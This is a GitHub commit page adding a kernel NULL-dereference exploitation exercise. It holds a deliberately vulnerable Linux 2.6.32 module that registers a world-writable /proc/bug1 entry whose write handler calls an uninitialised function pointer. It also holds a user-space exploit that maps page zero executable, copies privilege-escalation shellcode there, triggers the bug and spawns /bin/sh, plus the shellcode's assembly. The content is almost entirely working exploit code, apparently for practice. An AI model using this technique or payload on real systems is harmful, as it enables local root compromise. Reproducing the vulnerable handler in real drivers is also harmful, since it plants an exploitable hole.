Skip to content

Navigation Menu

Sign in
Appearance settings

Search code, repositories, users, issues, pull requests...

Provide feedback

We read every piece of feedback, and take your input very seriously.

Saved searches

Use saved searches to filter your results more quickly
Appearance settings

Commit 3567173

Browse filesBrowse files
w0lfzhangw0lfzhang
committed
add null_dereference
1 parent b91726d commit 3567173
Copy full SHA for 3567173

File tree

Expand file treeCollapse file tree

4 files changed

+60
-0
lines changed
Open diff view settings
Filter options
Expand file treeCollapse file tree

4 files changed

+60
-0
lines changed
Open diff view settings
Collapse file

‎null_exp/Makefile‎

Copy file name to clipboard
+9Lines changed: 9 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,9 @@
1+
obj-m := null.o
2+
KERNELDIR := /lib/modules/2.6.32.21/build
3+
PWD := $(shell pwd)
4+
modules:
5+
$(MAKE) -C $(KERNELDIR) M=$(PWD) modules
6+
modules_install:
7+
$(MAKE) -C $(KERNELDIR) M=$(PWD) modules_install
8+
clean:
9+
rm -rf *.o *~ core .depend .*.cmd *.ko *.mod.c .tmp_versions
Collapse file

‎null_exp/null.c‎

Copy file name to clipboard
+27Lines changed: 27 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,27 @@
1+
#include <linux/init.h>
2+
#include <linux/module.h>
3+
#include <linux/kernel.h>
4+
#include <linux/proc_fs.h>
5+
6+
void (*my_funptr)(void);
7+
8+
int bug1_write(struct file *file, const char *buf, unsigned long len)
9+
{
10+
my_funptr();
11+
return len;
12+
}
13+
14+
static int init_func(void)
15+
{
16+
printk(KERN_ALERT "null_dereference driver init!\n");
17+
create_proc_entry("bug1", 0666, 0)->write_proc = bug1_write;
18+
return 0;
19+
}
20+
21+
static void exit_func(void)
22+
{
23+
printk(KERN_ALERT "null_dereference driver exit\n");
24+
}
25+
26+
module_init(init_func);
27+
module_exit(exit_func);
Collapse file

‎null_exp/null_exp.c‎

Copy file name to clipboard
+20Lines changed: 20 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,20 @@
1+
#include <sys/types.h>
2+
#include <sys/stat.h>
3+
#include <fcntl.h>
4+
#include <stdio.h>
5+
#include <stdlib.h>
6+
#include <string.h>
7+
#include <sys/mman.h>
8+
9+
char payload[] = "\x31\xc0\xe8\xe9\xb2\x16\xc0\xe8\xa4\xaf\x16\xc0\xc3";
10+
11+
int main()
12+
{
13+
mmap(0, 4096, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_FIXED | MAP_PRIVATE | MAP_ANONYMOUS , -1, 0);
14+
memcpy(0, payload, sizeof(payload));
15+
16+
int fd = open("/proc/bug1", O_WRONLY);
17+
write(fd, "foo", 3);
18+
system("/bin/sh");
19+
return 0;
20+
}
Collapse file

‎null_exp/sc.s‎

Copy file name to clipboard
+4Lines changed: 4 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,4 @@
1+
xor %eax,%eax
2+
call 0xc016b2f0
3+
call 0xc016afb0
4+
ret

0 commit comments

Comments
0 (0)
Morty Proxy This is a proxified and sanitized view of the page, visit original site.